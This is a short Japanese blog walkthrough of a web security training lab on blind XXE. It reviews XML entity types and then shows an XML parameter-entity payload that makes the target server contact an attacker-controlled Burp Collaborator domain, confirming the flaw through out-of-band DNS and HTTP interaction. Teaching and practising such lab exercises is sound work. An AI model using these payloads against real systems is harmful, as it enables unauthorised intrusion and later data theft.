shikata ga nai

Private? There is no such things.

Blind XXE with out-of-band interaction via XML parameter entitiesをやってみた

Hello there, ('ω')ノ

 

XMLパラメータエンティティを介した帯域外相互作用を伴うブラインドXXEを。

予期しない値は表示されず、外部エンティティをはブロックされるとのことで。

なので、パラメータエンティティを使用する必要があるらしく。

ここでエンティティのおさらいを。

 

例:

 内部エンティティ

 <!ENTITY xxe "hack">

 &xxe;

 

 外部エンティティ

 <!ENTITY xxe SYSTEM "http://www.example.com">

 &xxe;

 

 パラメータエンティティ(DTD内のみで参照)

  <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://www.example.com"> %xxe; ]>

 

まずは、Check stockをクリックして。

 

f:id:ThisIsOne:20210304154711p:plain

 

xmlのリクエストをリピータへ。

 

f:id:ThisIsOne:20210304154741p:plain

 

コラボレータを起動して、ペイロードをコピーして。

 

f:id:ThisIsOne:20210304154957p:plain

 

コピーしたBurpCollaboratorサブドメインを挿入してパラメータエンティティを。

 

 <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://aesbba5kc6qdtk73wl35pwr55wbmzb.burpcollaborator.net"> %xxe; ]>

 

f:id:ThisIsOne:20210304155424p:plain


Poll nowで、ペイロードに起因するネットワーク相互作用の詳細を取得して。

ペイロードによって、攻撃者のドメインへのDNSルックアップと。

HTTPリクエストが発生して、攻撃が成功したことを確認して。

 

f:id:ThisIsOne:20210304155219p:plain


クリアできた。

 

f:id:ThisIsOne:20210304155240p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain